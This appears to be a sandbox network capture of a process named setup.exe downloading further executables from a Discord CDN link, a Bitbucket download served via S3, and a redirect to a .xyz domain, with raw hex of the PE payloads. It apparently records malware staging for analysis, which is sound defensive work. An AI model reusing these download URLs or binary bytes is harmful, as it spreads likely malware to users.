2024-07-01 22:05:08 UTC	1369	IN	Data Raw: fc ff ff 8b f0 8b c3 e8 20 fc ff ff 3d 00 04 00 00 7d 2b 68 00 04 00 00 8d 44 24 04 50 56 8b c3 e8 27 fd ff ff 50 6a 00 6a 00 e8 0d db ff ff 50 8d 44 24 04 50 e8 22 db ff ff 8b f8 eb 28 6a 00 6a 00 56 53 6a 00 6a 00 e8 ef da ff ff 8b e8 55 6a 00 e8 05 db ff ff 8b f8 55 57 56 53 6a 00 6a 00 e8 d6 da ff ff 8b c7 81 c4 00 08 00 00 5d 5f 5e 5b c3 90 b0 0f e9 d1 ee ff ff c3 b0 10 e9 c9 ee ff ff c3 31 d2 66 8b 10 f7 c2 00 40 00 00 75 1a 83 fa 08 72 15 81 fa 00 01 00 00 75 13 66 c7 00 00 00 83 c0 08 e9 25 fa ff ff 66 c7 00 00 00 c3 50 e8 b5 da ff ff c3 39 d0 74 6c 66 83 38 08 72 1b 50 52 66 81 38 00 01 74 08 50 e8 9b da ff ff eb 08 83 c0 08 e8 f5 f9 ff ff 5a 58 66 83 3a 08 73 11 8b 0a 89 08 8b 4a 08 89 48 08 8b 4a 0c 89 48 0c c3 66 81 3a 00 01 75 19 8b 52 08 09 Data Ascii: =}+hD$PV'PjjPD$P"(jjVSjjUjUWVSjj]_^[1f@uruf%fP9tlf8rPRf8tPZXf:sJHJHf:uR
2024-07-01 22:05:08 UTC	1369	IN	Data Raw: ff ff eb db 8d 88 4c 01 00 00 89 48 14 33 c9 89 08 c7 40 04 b0 d7 00 00 c7 40 08 80 00 00 00 89 48 0c 89 48 10 c7 40 18 97 3a 40 00 89 48 1c 89 48 20 89 48 24 8d 40 48 85 d2 74 1b b5 82 8a 0a 42 88 08 40 84 c9 74 11 8a 0a 42 88 08 40 84 c9 74 07 fe cd 75 e8 48 88 28 c3 8b 50 04 81 fa b2 d7 00 00 75 08 ff 50 1c 85 c0 75 0e c3 81 fa b1 d7 00 00 74 f7 b8 67 00 00 00 e9 d4 e9 ff ff 8b 50 04 81 fa b2 d7 00 00 75 08 ff 50 20 85 c0 75 0e c3 81 fa b1 d7 00 00 74 f7 b8 67 00 00 00 e9 af e9 ff ff 8d 40 00 53 8b d8 8b 50 04 81 ea b1 d7 00 00 74 0e 83 fa 02 77 19 ff 50 1c 85 c0 75 0b 8b c3 ff 53 24 85 c0 75 02 5b c3 e8 82 e9 ff ff eb f7 3d 38 c0 40 00 74 f0 b8 67 00 00 00 eb eb 8b c0 a3 20 c0 40 00 80 3d 30 c0 40 00 00 74 17 80 3d 14 c4 40 00 01 0f 82 c0 00 00 00 74 Data Ascii: LH3@@HH@:@HH H$@HtB@tB@tuH(PuPutgPuP utg@SPtwPuS$u[=8@tg @=0@t=@t

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49727	162.159.133.233	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:08 UTC	373	OUT	HEAD /attachments/1255737669737254954/1257455463088394404/setup.exe?ex=66847828&is=668326a8&hm=9a0a6baa5ff045d491afd87efad3dd033618cc8c5ce04018ccc10ef67b97fd67& HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: cdn.discordapp.com Connection: Keep-Alive
2024-07-01 22:05:08 UTC	1173	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 22:05:08 GMT Content-Type: application/x-msdos-program Content-Length: 7636477 Connection: close CF-Ray: 89c9b21ece2832e8-EWR CF-Cache-Status: MISS Accept-Ranges: bytes, bytes Cache-Control: public, max-age=31536000 Content-Disposition: attachment ETag: "3821b6ad2be5c1f137f798889c75b8fc" Expires: Tue, 01 Jul 2025 22:05:08 GMT Last-Modified: Mon, 01 Jul 2024 21:59:04 GMT Vary: Accept-Encoding alt-svc: h3=":443"; ma=86400 x-goog-generation: 1719871144890346 x-goog-hash: crc32c=kSGWsQ== x-goog-hash: md5=OCG2rSvlwfE395iInHW4/A== x-goog-metageneration: 1 x-goog-storage-class: STANDARD x-goog-stored-content-encoding: identity x-goog-stored-content-length: 7636477 x-guploader-uploadid: ACJd0Np29-ywn_bknvzBbWQPWi6je93q8YWIb3oC-pnVrViGhoXdBYZCmchRxadYSuklXT9T4fk X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp Set-Cookie: __cf_bm=ex.7TgCY468wc5yu3YRkEsGRG9qmHn86dcAYyaJ385w-1719871508-1.0.1.1-5hdHtN2CIlAZ3ndgxjU1QFbaLT0pT5n.uDcbnhaYWTdTD8z4UsNVmuHyiV0JqEgrvJtmikuVD.LZq.kf7BpweA; path=/; expires=Mon, 01-Jul-24 22:35:08 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
2024-07-01 22:05:08 UTC	527	IN	Data Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 48 4f 5a 25 32 46 4b 48 69 30 70 58 25 32 46 77 25 32 46 73 30 66 6d 36 63 55 4d 4c 71 56 76 57 6c 66 48 59 58 7a 67 57 53 76 71 4f 71 4f 77 7a 4f 6c 39 6b 58 45 25 32 46 72 55 32 78 46 47 66 6f 66 72 61 4f 49 6f 70 30 4b 44 75 31 4a 6f 76 6e 47 49 7a 66 79 55 35 47 25 32 46 73 6b 58 51 6d 66 48 25 32 42 4a 35 39 59 59 49 54 44 69 31 65 50 68 4f 53 77 7a 61 65 78 45 51 51 64 37 50 50 69 38 67 44 25 32 46 63 25 32 42 64 6e 37 62 25 32 46 78 46 65 62 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HOZ%2FKHi0pX%2Fw%2Fs0fm6cUMLqVvWlfHYXzgWSvqOqOwzOl9kXE%2FrU2xFGfofraOIop0KDu1JovnGIzfyU5G%2FskXQmfH%2BJ59YYITDi1ePhOSwzaexEQQd7PPi8gD%2Fc%2Bdn7b%2FxFebA%3D%3D"}],"group":"cf-nel

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49732	104.192.141.1	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:08 UTC	224	OUT	GET /sdgdf/fbghhj/downloads/streamer.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: bitbucket.org Cache-Control: no-cache
2024-07-01 22:05:08 UTC	4289	IN	HTTP/1.1 302 Found server: envoy x-usage-quota-remaining: 999144.749 vary: Accept-Language, Origin x-usage-request-cost: 870.63 cache-control: max-age=0, no-cache, no-store, must-revalidate, private Content-Type: text/html; charset=utf-8 x-b3-traceid: b32131f748e4fbb1 x-usage-output-ops: 0 x-used-mesh: False x-dc-location: Micros-3 content-security-policy: connect-src bitbucket.org .bitbucket.org bb-inf.net .bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1.prod.public.atl-paas.net as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com atl-global.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net fd-assets.prod.atl-paas.net flight-deck-assets-bifrost.prod-east.frontend.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net www.google-analytics.com sentry.io *.ingest.sentry.io events.launchdarkly.com app.launchdarkly.com fd-config.us-east-1.prod.public.atl-paas.net fd-config-bifrost.prod-east.frontend.public.atl-paas.net micros--prod [TRUNCATED] Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Date: Mon, 01 Jul 2024 22:05:08 GMT x-usage-user-time: 0.025668 x-usage-system-time: 0.000451 location: https://bbuseruploads.s3.amazonaws.com/bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/67e8095f-ddaa-4765-8f3a-5f79b5cf66c0/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHVJXWTXU&Signature=6x0j3jCqJIu9ecs3s6GtlhgLnsU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQD%2F2aNgvwR%2BzDTfk81ofa8RoMfgWY6HIHaPq6AVG5xEYAIhAJqDf3iSPie3cXsxWWnwnW8qwgK1Tac0vhv18BHJA7wsKqcCCGcQABoMOTg0NTI1MTAxMTQ2Igy8ya024r6DMXH4P4YqhAKQSomtAk%2FsqiXI2%2F3voOa7hrDvFCv9VrBtu1RIEm99MXJW7beO%2B2HqROhFQwyiH1W0FURY0nM66e6QQ1eshMPl6wuVF8aiDYVv80BaYrRUqqJbDBjHH6k2n7jlWpH4Tw1PMrRevf3ArvGyd9YcCfmAztez9uMctNQcfdK%2B8C3P%2FvVm04c%2BdJIDwxu6FMQq0TfQQoxa0hMkgxUcRdDJDFaLcnb6%2FG1Ej0KO3weudMoHZi%2FdazhGjoi%2BHAWbwlw8Vukp%2By8rtl0d%2B9YEZcfdwG6I0BtVaPDwyCTzPkXRYOFTrSdaG3zEncRQV%2FIvZhapXMg7J0ybYPS4gtKqOeLxnOmxMoOBwDDezIy0BjqcAU3U3hMrRgYyxiW6p641c%2FfbR5vglkKAfISIMwmD%2BNVhIbYo1lGxIuF0WNeBoNFVKIQ2SulUFhK2Nlg%2Ftsqf4kdPsqUD5oMW%2F [TRUNCATED] expires: Mon, 01 Jul 2024 22:05:08 GMT x-served-by: 0b12f4dfff74 x-envoy-upstream-service-time: 63 content-language: en x-view-name: bitbucket.apps.downloads.views.download_file x-b3-spanid: b32131f748e4fbb1 x-static-version: a022e62940a9 x-render-time: 0.0523374080657959 Connection: close x-usage-input-ops: 0 x-version: a022e62940a9 x-request-count: 1562 x-frame-options: SAMEORIGIN X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache" Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49736	45.130.41.108	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:09 UTC	207	OUT	GET /385137/setup.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Host: monoblocked.com Cache-Control: no-cache
2024-07-01 22:05:09 UTC	228	IN	HTTP/1.1 302 Found Server: nginx-reuseport/1.21.1 Date: Mon, 01 Jul 2024 22:05:09 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 303 Connection: close Location: https://a.884736279.xyz/385137/setup.exe
2024-07-01 22:05:09 UTC	303	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 2e 38 38 34 37 33 36 32 37 39 2e 78 79 7a 2f 33 38 35 31 33 37 2f 73 65 74 75 70 2e 65 78 65 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 35 20 28 55 6e 69 78 29 20 53 65 72 76 65 72 20 61 74 20 6d Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://a.884736279.xyz/385137/setup.exe">here</a>.</p><hr><address>Apache/2.4.55 (Unix) Server at m

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49737	3.5.20.219	443	5720	C:\Users\user\Desktop\1719859269.0326595_setup.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-01 22:05:09 UTC	1351	OUT	GET /bc2514d8-2277-4dd3-a4e2-b5b0ed90570d/downloads/67e8095f-ddaa-4765-8f3a-5f79b5cf66c0/streamer.exe?response-content-disposition=attachment%3B%20filename%3D%22streamer.exe%22&AWSAccessKeyId=ASIA6KOSE3BNHVJXWTXU&Signature=6x0j3jCqJIu9ecs3s6GtlhgLnsU%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK7%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJIMEYCIQD%2F2aNgvwR%2BzDTfk81ofa8RoMfgWY6HIHaPq6AVG5xEYAIhAJqDf3iSPie3cXsxWWnwnW8qwgK1Tac0vhv18BHJA7wsKqcCCGcQABoMOTg0NTI1MTAxMTQ2Igy8ya024r6DMXH4P4YqhAKQSomtAk%2FsqiXI2%2F3voOa7hrDvFCv9VrBtu1RIEm99MXJW7beO%2B2HqROhFQwyiH1W0FURY0nM66e6QQ1eshMPl6wuVF8aiDYVv80BaYrRUqqJbDBjHH6k2n7jlWpH4Tw1PMrRevf3ArvGyd9YcCfmAztez9uMctNQcfdK%2B8C3P%2FvVm04c%2BdJIDwxu6FMQq0TfQQoxa0hMkgxUcRdDJDFaLcnb6%2FG1Ej0KO3weudMoHZi%2FdazhGjoi%2BHAWbwlw8Vukp%2By8rtl0d%2B9YEZcfdwG6I0BtVaPDwyCTzPkXRYOFTrSdaG3zEncRQV%2FIvZhapXMg7J0ybYPS4gtKqOeLxnOmxMoOBwDDezIy0BjqcAU3U3hMrRgYyxiW6p641c%2FfbR5vglkKAfISIMwmD%2BNVhIbYo1lGxIuF0WNeBoNFVKIQ2SulUFhK2Nlg%2Ftsqf4kdPsqUD5oMW%2FuS6%2BrpQIaXGoZFElhRLRAMZFHDYRHsXbuRsAhBsBkY [TRUNCATED] User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Cache-Control: no-cache Host: bbuseruploads.s3.amazonaws.com Connection: Keep-Alive
2024-07-01 22:05:09 UTC	554	IN	HTTP/1.1 200 OK x-amz-id-2: hTD8VJgaXg036obSnK1ETEliis3DEnygjqQ1EThlnJHNa9WbXl5o+/7IaUPfbxXfGP5Mkj3j2dvWC62rr0QYOQ== x-amz-request-id: 0VTQEVH2ZZJ6BHR6 Date: Mon, 01 Jul 2024 22:05:10 GMT Last-Modified: Mon, 01 Jul 2024 14:39:58 GMT ETag: "2bc0db539a8fab08bf4104eb7f2de7e7" x-amz-server-side-encryption: AES256 x-amz-version-id: ijQj99FKtFeonPhtoHQ3FdabMKsa7xSc Content-Disposition: attachment; filename="streamer.exe" Accept-Ranges: bytes Content-Type: application/x-msdownload Server: AmazonS3 Content-Length: 8077824 Connection: close
2024-07-01 22:05:09 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 22 2e 00 00 3e 7b 00 00 f8 08 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 b0 84 00 00 04 00 00 01 70 7b 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$".>{@p{`
2024-07-01 22:05:09 UTC	470	IN	Data Raw: 6e f4 66 45 0f 70 f6 00 66 4d 0f 6e fd 66 45 0f 70 ff 00 66 0f fe e0 66 0f fe e9 66 0f fe f2 66 0f fe fb 66 45 0f fe c4 66 45 0f fe cd 66 45 0f fe d6 66 45 0f fe df f3 0f 7f 63 40 f3 0f 7f 6b 50 f3 0f 7f 73 60 f3 0f 7f 7b 70 f3 44 0f 7f 83 80 00 00 00 f3 44 0f 7f 8b 90 00 00 00 f3 44 0f 7f 93 a0 00 00 00 f3 44 0f 7f 9b b0 00 00 00 b8 00 00 00 00 66 4c 0f 6e f8 48 83 c4 10 5d c3 cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 2c 01 00 00 e8 c8 f1 ff ff 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 13 65 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 0f 86 30 01 00 00 55 48 89 e5 f2 0f 10 05 d2 bc 47 00 f2 0f 11 05 1a 4c 81 00 48 8b 05 8b 91 31 00 83 3d 64 50 81 00 00 74 13 e8 2d 84 06 00 49 89 03 48 8b 0d 6b c4 78 00 49 89 Data Ascii: nfEpfMnfEpfffffEfEfEfEc@kPs`{pDDDDfLnH]I;fvUHH,H]HD$H\$eHD$H\$I;f0UHGLH1=dPt-IHkxI
2024-07-01 22:05:09 UTC	16384	IN	Data Raw: 89 05 ec c3 78 00 48 8d 05 5d 1e 00 00 48 89 05 36 4c 81 00 48 8d 05 8f 2b 00 00 48 89 05 30 4c 81 00 5d c3 e8 c1 63 06 00 90 e9 bb fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 01 00 00 00 e8 68 81 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 73 63 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 02 00 00 00 e8 28 81 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 33 63 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c7 cc cc cc cc cc cc cc 49 3b 66 10 76 18 55 48 89 e5 48 83 ec 18 b9 10 00 00 00 e8 e8 80 06 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 f3 62 06 00 48 8b 44 24 08 48 8b 5c Data Ascii: xH]H6LH+H0L]cI;fvUHHhH]HD$H\$scHD$H\$I;fvUHH(H]HD$H\$3cHD$H\$I;fvUHHH]HD$H\$bHD$H\
2024-07-01 22:05:09 UTC	1024	IN	Data Raw: 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 b8 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 e4 ed 3e 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 c0 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 ac ed 3e 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 c8 00 00 00 48 89 4c 24 18 e8 1b 2d 03 00 48 8d 05 74 ed 3e 00 bb 08 00 00 00 e8 8a 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 33 03 00 e8 36 2f 03 00 e8 51 2d 03 00 48 8b 44 24 30 48 8b 88 d0 00 00 00 48 89 4c 24 18 e8 db 2c 03 00 48 8d 05 3c ed 3e 00 bb 08 00 00 00 e8 4a 35 03 Data Ascii: HD$D4/.HD$0HHL$-H>6HD$D{4/-HD$0HHL$[-H>5HD$D;4v/-HD$0HHL$-Ht>5HD$D36/Q-HD$0HHL$,H<>J5
2024-07-01 22:05:09 UTC	16384	IN	Data Raw: 0f b6 14 01 45 38 ca 74 e7 45 8d 59 bf 41 80 fb 19 77 04 41 83 c1 20 45 8d 5a bf 41 80 fb 19 77 09 41 83 c2 20 0f 1f 44 00 00 45 38 d1 74 c1 eb 8b 49 29 d8 49 8d 48 ff 48 89 ce 48 f7 d9 48 c1 f9 3f 48 8d 7b 01 48 21 cf 48 8d 04 3a 48 89 f3 48 83 c4 10 5d c3 48 89 c8 48 89 d9 e8 89 42 06 00 48 8d 05 34 6a 3f 00 bb 16 00 00 00 e8 b8 0e 03 00 90 48 89 44 24 08 48 89 5c 24 10 e8 68 1f 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 f9 fe ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 4c 8d 64 24 80 4d 3b 66 10 0f 86 5f 03 00 00 55 48 89 e5 48 81 ec f8 00 00 00 48 89 84 24 08 01 00 00 48 8b 08 48 85 c9 75 0e bb 09 00 00 00 48 8d 0d 7b ed 3e 00 eb 18 48 89 c8 0f 1f 44 00 00 e8 7b 8b 05 00 48 89 c1 48 8b 84 24 08 01 00 00 48 89 4c 24 78 Data Ascii: E8tEYAwA EZAwA DE8tI)IHHHH?H{H!H:HH]HHBH4j?HD$H\$hHD$H\$Ld$M;f_UHHH$HHuH{>HD{HH$HL$x
2024-07-01 22:05:09 UTC	1024	IN	Data Raw: 48 ff c0 48 8b 4c 24 10 48 8b 54 24 28 48 8b 5c 24 30 48 8b 33 0f ba e6 00 72 21 48 89 74 24 20 48 89 f0 48 83 ce 01 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 6b 48 8b 74 24 20 31 c0 48 89 44 24 18 48 39 c8 7c 32 48 8d 79 01 48 39 f8 7d 69 48 8d 05 2c dc 41 00 48 89 04 24 e8 6b de 05 00 45 0f 57 ff 4c 8b 35 98 c8 80 00 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 eb 88 c7 04 24 1e 00 00 00 e8 e6 f9 05 00 45 0f 57 ff 4c 8b 35 73 c8 80 00 65 4d 8b 36 4d 8b 36 48 8b 44 24 18 e9 60 ff ff ff 48 8d 44 24 38 0f 1f 44 00 00 e8 3b 48 02 00 48 83 c4 58 5d c3 48 89 f8 48 8b 7a 30 49 89 f0 48 83 e6 fe 48 89 b7 38 02 00 00 48 8b 72 30 48 83 ce 01 48 89 c7 4c 89 c0 f0 48 0f b1 33 40 0f 94 c6 40 84 f6 75 11 48 8b 33 0f ba e6 00 72 c6 48 89 f8 e9 09 ff ff ff 41 0f ba e0 00 73 22 48 Data Ascii: HHL$HT$(H\$0H3r!Ht$ HHH3@@ukHt$ 1HD$H9\|2HyH9}iH,AH$kEWL5eM6M6HD$$EWL5seM6M6HD$`HD$8D;HHX]HHz0IHH8Hr0HHLH3@@uH3rHAs"H
2024-07-01 22:05:09 UTC	16384	IN	Data Raw: f7 30 00 48 8b 09 48 89 0c 24 48 c7 44 24 08 00 00 00 00 e8 b2 f6 05 00 45 0f 57 ff 4c 8b 35 df c4 80 00 65 4d 8b 36 4d 8b 36 48 8b 4c 24 18 48 8b 5c 24 38 48 8b 13 48 85 d2 74 b6 eb 9e 48 8d 05 20 09 3f 00 bb 13 00 00 00 e8 db ca 02 00 90 48 89 44 24 08 e8 90 db 05 00 48 8b 44 24 08 e9 c6 fe ff ff cc cc cc cc cc cc 55 48 89 e5 48 83 ec 38 49 8b 4e 30 48 89 4c 24 20 48 8b 4c 24 20 48 89 c2 31 c0 f0 48 0f b1 0a 0f 94 c1 84 c9 74 6b 4c 89 74 24 30 48 85 db 7d 2d 49 8b 4e 30 c6 81 e5 00 00 00 01 48 8b 0d 75 f6 30 00 48 83 39 00 0f 85 16 02 00 00 48 c7 c0 ff ff ff ff e8 47 92 02 00 e9 bc 01 00 00 48 89 54 24 28 48 89 5c 24 50 e8 33 17 06 00 45 0f 57 ff 4c 8b 35 20 c4 80 00 65 4d 8b 36 4d 8b 36 48 8b 04 24 48 8b 5c 24 50 48 01 d8 48 89 44 24 18 eb 28 48 83 3a Data Ascii: 0HH$HD$EWL5eM6M6HL$H\$8HHtH ?HD$HD$UHH8IN0HL$ HL$ H1HtkLt$0H}-IN0Hu0H9HGHT$(H\$P3EWL5 eM6M6H$H\$PHHD$(H:
2024-07-01 22:05:09 UTC	1024	IN	Data Raw: e1 00 73 04 4d 8b 24 24 44 88 4c 24 1f 4c 89 64 24 48 0f b6 7e 51 49 0f af fb 4a 8d 3c ef 4a 8d 3c 17 48 8d 7f 08 48 89 7c 24 38 48 83 fa ff 0f 84 2b 01 00 00 44 0f b6 53 08 41 f6 c2 08 0f 85 1c 01 00 00 4c 89 44 24 30 0f ba e1 02 73 07 b9 01 00 00 00 eb 43 48 8b 4e 30 48 8b 51 18 48 8b 0a 4c 89 e0 48 89 c3 ff d1 48 8b 54 24 20 48 8b 5c 24 50 48 8b 74 24 40 48 8b 7c 24 38 4c 8b 44 24 30 44 0f b6 4c 24 1f 4c 8b 64 24 48 4c 8b 7c 24 58 89 c1 48 8b 44 24 70 84 c9 75 37 0f b6 48 4a ff c9 49 89 d2 48 d3 ea 47 0f b6 1c 38 41 83 e3 01 80 f9 40 4d 19 ed 49 21 d5 4d 39 eb 0f 84 9f 00 00 00 4c 89 d2 48 8b 7c 24 28 4d 89 fa e9 db fe ff ff 48 8b 56 48 48 8b 0a 8b 7b 0c 4c 89 e0 48 89 fb ff d1 48 8b 4c 24 70 0f b6 71 4a 48 89 ca 89 f1 bf 01 00 00 00 48 d3 e7 48 8d 4f Data Ascii: sM$$DL$Ld$H~QIJ<J<HH\|$8H+DSALD$0sCHN0HQHLHHT$ H\$PHt$@H\|$8LD$0DL$Ld$HL\|$XHD$pu7HJIHG8A@MI!M9LH\|$(MHVHH{LHHL$pqJHHHO
2024-07-01 22:05:09 UTC	11277	IN	Data Raw: 08 00 0f 85 bc 00 00 00 83 3d 6b 83 80 00 00 74 10 e8 34 b7 05 00 49 89 33 48 8b 79 08 49 89 7b 08 48 89 71 08 48 8b 4a 28 84 01 83 3d 48 83 80 00 00 74 0b 48 8b 31 e8 ee b6 05 00 49 89 33 48 c7 01 00 00 00 00 0f 1f 40 00 48 85 db 74 6f 48 83 7a 28 00 75 42 48 89 5c 24 28 48 8d 05 28 c3 39 00 e8 43 d9 ff ff 83 3d 0c 83 80 00 00 75 07 48 8b 4c 24 48 eb 15 e8 ce b6 05 00 49 89 03 48 8b 4c 24 48 48 8b 51 28 49 89 53 08 48 89 41 28 48 89 ca 48 8b 5c 24 28 48 8b 42 28 84 00 83 3d d5 82 80 00 00 74 13 0f 1f 00 e8 9b b6 05 00 49 89 1b 48 8b 48 10 49 89 4b 08 48 89 58 10 48 83 c4 30 5d c3 48 8d 05 13 e2 3e 00 bb 16 00 00 00 e8 55 86 02 00 90 48 89 44 24 08 48 89 5c 24 10 e8 05 97 05 00 48 8b 44 24 08 48 8b 5c 24 10 e9 16 fe ff ff cc cc cc cc cc cc cc cc cc cc cc Data Ascii: =kt4I3HyI{HqHJ(=HtH1I3H@HtoHz(uBH\$(H(9C=uHL$HIHL$HHQ(ISHA(HH\$(HB(=tIHHIKHXH0]H>UHD$H\$HD$H\$
